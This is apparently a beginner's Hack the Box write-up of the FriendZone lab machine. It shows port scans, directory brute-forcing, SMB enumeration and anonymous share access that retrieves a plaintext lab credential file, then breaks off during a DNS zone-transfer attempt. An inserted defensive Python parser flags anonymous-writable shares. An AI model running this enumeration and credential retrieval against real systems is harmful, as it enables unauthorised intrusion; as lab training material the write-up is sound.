
[Hack the Box write-up] FriendZone

☕ 9 min read · ✍️ さんぽし

Introduction

I am a Hack the Box beginner.
If you have any corrections, additions, or advice, please leave a comment or contact me on Twitter.
さんぽし (@sanpo_shiho) | Twitter

cheat sheet

I keep a cheat sheet of tool usage and similar notes at the link below; feel free to refer to it.
github | sanposhiho/MY_CHEAT_SHEET

About the machine

The difficulty is easy.
(Screenshot: 2020-06-22 10.37.52.png)

Among the easy machines, this one is on the harder side.

(Screenshot: 2020-06-22 10.46.16.png)

nmap

kali@kali:~$ nmap -sV -sC 10.10.10.123
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-20 00:08 EDT
Nmap scan report for 10.10.10.123
Host is up (0.23s latency).
Not shown: 993 closed ports
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 3.0.3
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
|   256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
|_  256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
53/tcp  open  domain      ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open  ssl/http    Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 404 Not Found
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after:  2018-11-04T21:02:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Hosts: FRIENDZONE, 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -55m52s, deviation: 1h43m54s, median: 4m06s
|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: friendzone
|   NetBIOS computer name: FRIENDZONE\x00
|   Domain name: \x00
|   FQDN: friendzone
|_  System time: 2020-06-20T07:13:43+03:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-06-20T04:13:42
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 72.33 seconds

Port 80

(Screenshot: 2020-06-20 13.16.53.png)

gobuster

kali@kali:~$ gobuster dir -u http://10.10.10.123 -w SecLists/Discovery/Web-Content/big.txt  -k -t 40 -x php,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.123
[+] Threads:        40
[+] Wordlist:       SecLists/Discovery/Web-Content/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,txt
[+] Timeout:        10s
===============================================================
2020/06/20 00:18:04 Starting gobuster
===============================================================
/.htpasswd (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.txt (Status: 403)
/.htaccess (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.txt (Status: 403)
/robots.txt (Status: 200)
/robots.txt (Status: 200)
/server-status (Status: 403)
/wordpress (Status: 301)

kali@kali:~$ gobuster dir -u http://10.10.10.123/wordpress -w SecLists/Discovery/Web-Content/big.txt  -k -t 40 -x php,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.123/wordpress
[+] Threads:        40
[+] Wordlist:       SecLists/Discovery/Web-Content/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,txt
[+] Timeout:        10s
===============================================================
2020/06/21 16:39:16 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.txt (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.txt (Status: 403)
===============================================================
2020/06/21 16:46:07 Finished
===============================================================

Port 443

(Screenshot: 2020-06-20 13.25.26.png)

gobuster

kali@kali:~$ gobuster dir -u https://10.10.10.123 -w SecLists/Discovery/Web-Content/big.txt  -k -t 40 -x php,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            https://10.10.10.123
[+] Threads:        40
[+] Wordlist:       SecLists/Discovery/Web-Content/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,txt
[+] Timeout:        10s
===============================================================
2020/06/20 00:24:32 Starting gobuster
===============================================================
/server-status (Status: 403)
===============================================================
2020/06/20 00:31:12 Finished
===============================================================

enum4linux

kali@kali:~$ enum4linux -a 10.10.10.123
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Jun 21 14:27:20 2020

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.10.10.123
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ==================================================== 
|    Enumerating Workgroup/Domain on 10.10.10.123    |
 ==================================================== 
[+] Got domain/workgroup name: WORKGROUP

 ============================================ 
|    Nbtstat Information for 10.10.10.123    |
 ============================================ 
Looking up status of 10.10.10.123
        FRIENDZONE      <00> -         B <ACTIVE>  Workstation Service
        FRIENDZONE      <03> -         B <ACTIVE>  Messenger Service
        FRIENDZONE      <20> -         B <ACTIVE>  File Server Service
        ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
        WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
        WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
        WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections

        MAC Address = 00-00-00-00-00-00

 ===================================== 
|    Session Check on 10.10.10.123    |
 ===================================== 
[+] Server 10.10.10.123 allows sessions using username '', password ''

 =========================================== 
|    Getting domain SID for 10.10.10.123    |
 =========================================== 
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 ====================================== 
|    OS information on 10.10.10.123    |
 ====================================== 
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 10.10.10.123 from smbclient: 
[+] Got OS info for 10.10.10.123 from srvinfo:
        FRIENDZONE     Wk Sv PrQ Unx NT SNT FriendZone server (Samba, Ubuntu)
        platform_id     :       500
        os version      :       6.1
        server type     :       0x809a03

 ============================= 
|    Users on 10.10.10.123    |
 ============================= 
Use of uninitialized value $users in print at ./enum4linux.pl line 874.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 877.

Use of uninitialized value $users in print at ./enum4linux.pl line 888.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 890.

 ========================================= 
|    Share Enumeration on 10.10.10.123    |
 ========================================= 

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        Files           Disk      FriendZone Samba Server Files /etc/Files
        general         Disk      FriendZone Samba Server Files
        Development     Disk      FriendZone Samba Server Files
        IPC$            IPC       IPC Service (FriendZone server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on 10.10.10.123
//10.10.10.123/print$   Mapping: DENIED, Listing: N/A
//10.10.10.123/Files    Mapping: DENIED, Listing: N/A
//10.10.10.123/general  Mapping: OK, Listing: OK
//10.10.10.123/Development      Mapping: OK, Listing: OK
//10.10.10.123/IPC$     [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

 ==================================================== 
|    Password Policy Information for 10.10.10.123    |
 ==================================================== 
[E] Unexpected error from polenum:


[+] Attaching to 10.10.10.123 using a NULL share

[+] Trying protocol 139/SMB...

        [!] Protocol failed: Missing required parameter 'digestmod'.

[+] Trying protocol 445/SMB...

        [!] Protocol failed: Missing required parameter 'digestmod'.


[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 5


 ============================== 
|    Groups on 10.10.10.123    |
 ============================== 

[+] Getting builtin groups:

[+] Getting builtin group memberships:

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:

[+] Getting domain group memberships:

 ======================================================================= 
|    Users on 10.10.10.123 via RID cycling (RIDS: 500-550,1000-1050)    |
 ======================================================================= 
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-3651157261-4258463691-276428382
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-500 *unknown*\*unknown* (8)
S-1-5-32-501 *unknown*\*unknown* (8)
S-1-5-32-502 *unknown*\*unknown* (8)
S-1-5-32-503 *unknown*\*unknown* (8)
S-1-5-32-504 *unknown*\*unknown* (8)
S-1-5-32-505 *unknown*\*unknown* (8)
S-1-5-32-506 *unknown*\*unknown* (8)
S-1-5-32-507 *unknown*\*unknown* (8)
S-1-5-32-508 *unknown*\*unknown* (8)
S-1-5-32-509 *unknown*\*unknown* (8)
S-1-5-32-510 *unknown*\*unknown* (8)
S-1-5-32-511 *unknown*\*unknown* (8)
S-1-5-32-512 *unknown*\*unknown* (8)
S-1-5-32-513 *unknown*\*unknown* (8)
S-1-5-32-514 *unknown*\*unknown* (8)
S-1-5-32-515 *unknown*\*unknown* (8)
S-1-5-32-516 *unknown*\*unknown* (8)
S-1-5-32-517 *unknown*\*unknown* (8)
S-1-5-32-518 *unknown*\*unknown* (8)
S-1-5-32-519 *unknown*\*unknown* (8)
S-1-5-32-520 *unknown*\*unknown* (8)
S-1-5-32-521 *unknown*\*unknown* (8)
S-1-5-32-522 *unknown*\*unknown* (8)
S-1-5-32-523 *unknown*\*unknown* (8)
S-1-5-32-524 *unknown*\*unknown* (8)
S-1-5-32-525 *unknown*\*unknown* (8)
S-1-5-32-526 *unknown*\*unknown* (8)
S-1-5-32-527 *unknown*\*unknown* (8)
S-1-5-32-528 *unknown*\*unknown* (8)
S-1-5-32-529 *unknown*\*unknown* (8)
S-1-5-32-530 *unknown*\*unknown* (8)
S-1-5-32-531 *unknown*\*unknown* (8)
S-1-5-32-532 *unknown*\*unknown* (8)
S-1-5-32-533 *unknown*\*unknown* (8)
S-1-5-32-534 *unknown*\*unknown* (8)
S-1-5-32-535 *unknown*\*unknown* (8)
S-1-5-32-536 *unknown*\*unknown* (8)
S-1-5-32-537 *unknown*\*unknown* (8)
S-1-5-32-538 *unknown*\*unknown* (8)
S-1-5-32-539 *unknown*\*unknown* (8)
S-1-5-32-540 *unknown*\*unknown* (8)
S-1-5-32-541 *unknown*\*unknown* (8)
S-1-5-32-542 *unknown*\*unknown* (8)
S-1-5-32-543 *unknown*\*unknown* (8)
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
S-1-5-32-1000 *unknown*\*unknown* (8)
S-1-5-32-1001 *unknown*\*unknown* (8)
S-1-5-32-1002 *unknown*\*unknown* (8)
S-1-5-32-1003 *unknown*\*unknown* (8)
S-1-5-32-1004 *unknown*\*unknown* (8)
S-1-5-32-1005 *unknown*\*unknown* (8)
S-1-5-32-1006 *unknown*\*unknown* (8)
S-1-5-32-1007 *unknown*\*unknown* (8)
S-1-5-32-1008 *unknown*\*unknown* (8)
S-1-5-32-1009 *unknown*\*unknown* (8)
S-1-5-32-1010 *unknown*\*unknown* (8)
S-1-5-32-1011 *unknown*\*unknown* (8)
S-1-5-32-1012 *unknown*\*unknown* (8)
S-1-5-32-1013 *unknown*\*unknown* (8)
S-1-5-32-1014 *unknown*\*unknown* (8)
S-1-5-32-1015 *unknown*\*unknown* (8)
S-1-5-32-1016 *unknown*\*unknown* (8)
S-1-5-32-1017 *unknown*\*unknown* (8)
S-1-5-32-1018 *unknown*\*unknown* (8)
S-1-5-32-1019 *unknown*\*unknown* (8)
S-1-5-32-1020 *unknown*\*unknown* (8)
S-1-5-32-1021 *unknown*\*unknown* (8)
S-1-5-32-1022 *unknown*\*unknown* (8)
S-1-5-32-1023 *unknown*\*unknown* (8)
S-1-5-32-1024 *unknown*\*unknown* (8)
S-1-5-32-1025 *unknown*\*unknown* (8)
S-1-5-32-1026 *unknown*\*unknown* (8)
S-1-5-32-1027 *unknown*\*unknown* (8)
S-1-5-32-1028 *unknown*\*unknown* (8)
S-1-5-32-1029 *unknown*\*unknown* (8)
S-1-5-32-1030 *unknown*\*unknown* (8)
S-1-5-32-1032 *unknown*\*unknown* (8)
S-1-5-32-1033 *unknown*\*unknown* (8)
S-1-5-32-1034 *unknown*\*unknown* (8)
S-1-5-32-1035 *unknown*\*unknown* (8)
S-1-5-32-1036 *unknown*\*unknown* (8)
S-1-5-32-1037 *unknown*\*unknown* (8)
S-1-5-32-1038 *unknown*\*unknown* (8)
S-1-5-32-1039 *unknown*\*unknown* (8)
S-1-5-32-1040 *unknown*\*unknown* (8)
S-1-5-32-1041 *unknown*\*unknown* (8)
S-1-5-32-1042 *unknown*\*unknown* (8)
S-1-5-32-1043 *unknown*\*unknown* (8)
S-1-5-32-1044 *unknown*\*unknown* (8)
S-1-5-32-1045 *unknown*\*unknown* (8)
S-1-5-32-1046 *unknown*\*unknown* (8)
S-1-5-32-1047 *unknown*\*unknown* (8)
S-1-5-32-1048 *unknown*\*unknown* (8)
S-1-5-32-1049 *unknown*\*unknown* (8)
S-1-5-32-1050 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\friend (Local User)
[+] Enumerating users using SID S-1-5-21-3651157261-4258463691-276428382 and logon username '', password ''
S-1-5-21-3651157261-4258463691-276428382-500 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-501 FRIENDZONE\nobody (Local User)
S-1-5-21-3651157261-4258463691-276428382-502 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-503 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-504 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-505 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-506 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-507 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-508 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-509 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-510 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-511 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-512 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-513 FRIENDZONE\None (Domain Group)
S-1-5-21-3651157261-4258463691-276428382-514 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-515 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-516 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-517 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-518 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-519 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-520 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-521 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-522 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-523 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-524 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-525 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-526 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-527 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-528 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-529 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-530 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-531 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-532 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-533 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-534 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-535 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-536 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-537 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-538 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-539 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-540 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-541 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-542 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-543 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-544 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-545 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-546 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-547 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-548 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-549 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-550 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1000 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1001 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1002 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1003 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1004 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1005 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1006 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1007 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1008 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1009 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1010 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1011 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1012 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1013 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1014 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1015 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1016 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1017 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1018 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1019 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1020 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1021 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1022 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1023 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1024 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1025 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1026 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1027 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1028 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1029 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1030 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1031 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1032 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1033 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1034 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1035 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1036 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1037 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1038 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1039 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1040 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1041 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1042 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1043 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1044 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1045 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1046 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1047 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1048 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1049 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1050 *unknown*\*unknown* (8)

 ============================================= 
|    Getting printer info for 10.10.10.123    |
 ============================================= 
No printers returned.


enum4linux complete on Sun Jun 21 14:56:12 2020

nmap-script smb

kali@kali:~$ nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.10.123
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-21 14:35 EDT
Nmap scan report for 10.10.10.123
Host is up (0.26s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-enum-shares: 
|   account_used: guest
|   \\10.10.10.123\Development: 
|     Type: STYPE_DISKTREE
|     Comment: FriendZone Samba Server Files
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\etc\Development
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.10.123\Files: 
|     Type: STYPE_DISKTREE
|     Comment: FriendZone Samba Server Files /etc/Files
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\etc\hole
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.10.123\IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (FriendZone server (Samba, Ubuntu))
|     Users: 1
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.10.123\general: 
|     Type: STYPE_DISKTREE
|     Comment: FriendZone Samba Server Files
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\etc\general
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.10.123\print$: 
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\var\lib\samba\printers
|     Anonymous access: <none>
|_    Current user access: <none>
|_smb-enum-users: ERROR: Script execution failed (use -d to debug)
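The security-relevant finding in the output above is not the share list itself but the `Anonymous access: READ/WRITE` lines on `Development` and `general`: an unauthenticated client can write into directories under `/etc`. The following is an added example (my own code, not part of the original write-up or of nmap) that pulls exactly those lines out of `smb-enum-shares` output so the finding is machine-checkable. The sample text is a constructed excerpt in the shape shown on this page; `IPC$` is skipped by default because anonymous access to the IPC pipe is normal on Samba and is not a file-exposure finding.

```python
import re

# Constructed sample: an excerpt of `nmap --script smb-enum-shares` output,
# trimmed to the fields the check needs (share names and access levels as on the page).
SAMPLE_NMAP_OUTPUT = r"""
Host script results:
| smb-enum-shares: 
|   account_used: guest
|   \\10.10.10.123\Development: 
|     Type: STYPE_DISKTREE
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.10.123\Files: 
|     Type: STYPE_DISKTREE
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.10.123\IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.10.123\general: 
|     Type: STYPE_DISKTREE
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.10.123\print$: 
|     Type: STYPE_DISKTREE
|     Anonymous access: <none>
|_    Current user access: <none>
"""

# A share header line looks like "|   \\10.10.10.123\Development: " (trailing space included).
SHARE_RE = re.compile(r"^\|[_ ]\s*\\\\[^\\]+\\([^:]+):\s*$")
# The per-share access line we care about.
ANON_RE = re.compile(r"^\|[_ ]\s*Anonymous access:\s*(.+?)\s*$")


def parse_share_access(text):
    """Return {share name: anonymous access level} from smb-enum-shares output."""
    access = {}
    current = None
    for line in text.splitlines():
        m = SHARE_RE.match(line)
        if m:
            current = m.group(1)
            access[current] = "<unparsed>"   # replaced once the access line is seen
            continue
        m = ANON_RE.match(line)
        if m and current is not None:
            access[current] = m.group(1)
    return access


def anonymous_writable_shares(text, ignore_ipc=True):
    """Shares an unauthenticated client can write to, in output order."""
    return [
        name
        for name, level in parse_share_access(text).items()
        if "WRITE" in level.upper() and not (ignore_ipc and name.upper() == "IPC$")
    ]


def anonymous_readable_shares(text):
    """Shares an unauthenticated client can at least read (includes writable ones)."""
    return [
        name
        for name, level in parse_share_access(text).items()
        if "READ" in level.upper() and name.upper() != "IPC$"
    ]


if __name__ == "__main__":
    for share in anonymous_writable_shares(SAMPLE_NMAP_OUTPUT):
        print(f"finding: anonymous WRITE on share {share}")
```

On the sample this reports `Development` and `general`. On the Samba side the corresponding hardening is per-share `guest ok = no` (or `writable = no` where guests only need to read), which is what would turn these lines back into `<none>`.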

Connecting to the shares with smbclient

kali@kali:~$ smbclient //10.10.10.123/general
Enter WORKGROUP\kali's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jan 16 15:10:51 2019
  ..                                  D        0  Wed Jan 23 16:51:02 2019
  creds.txt                           N       57  Tue Oct  9 19:52:42 2018

                9221460 blocks of size 1024. 6460296 blocks available
smb: \> get creds.txt
getting file \creds.txt of size 57 as creds.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \> exit
kali@kali:~$ smbclient //10.10.10.123/Development
Enter WORKGROUP\kali's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Jun 21 14:40:00 2020
  ..                                  D        0  Wed Jan 23 16:51:02 2019

                9221460 blocks of size 1024. 6460296 blocks available
smb: \> exit
kali@kali:~$ cat creds.txt 
creds for the admin THING:

admin:WORKWORKHhallelujah@#


We got some kind of credentials.

hostname

Port 443 only returns 404 Not Found and gives no information, but looking at the certificate reveals the hostname friendzone.red.

(Screenshot: 2020-06-22 5.52.10.png)

Add `10.10.10.123 friendzone.red` to /etc/hosts and access it.

(Screenshot: 2020-06-22 5.53.54.png)

gobuster again

kali@kali:~$ gobuster dir -u https://friendzone.red -w SecLists/Discovery/Web-Content/big.txt  -k -t 40 -x php,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            https://friendzone.red
[+] Threads:        40
[+] Wordlist:       SecLists/Discovery/Web-Content/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,txt
[+] Timeout:        10s
===============================================================
2020/06/21 16:55:39 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.txt (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.txt (Status: 403)
/admin (Status: 301)
/js (Status: 301)
/server-status (Status: 403)
===============================================================
2020/06/21 17:02:30 Finished
===============================================================

/js/js

(screenshot of /js/js)

Testing some functions !
I'am trying not to break things !
TzNlR0g4QzhnSzE1OTI3NzM5NTl4R2tlRjcwdE15

The string changed on every visit.
Hmm, I don't really get it, so I'll leave it for later.

subdomain enumeration

Port 53 is open, so let's investigate subdomains.

kali@kali:~$ host -l friendzone.red 10.10.10.123
Using domain server:
Name: 10.10.10.123
Address: 10.10.10.123#53
Aliases: 

friendzone.red has IPv6 address ::1
friendzone.red name server localhost.
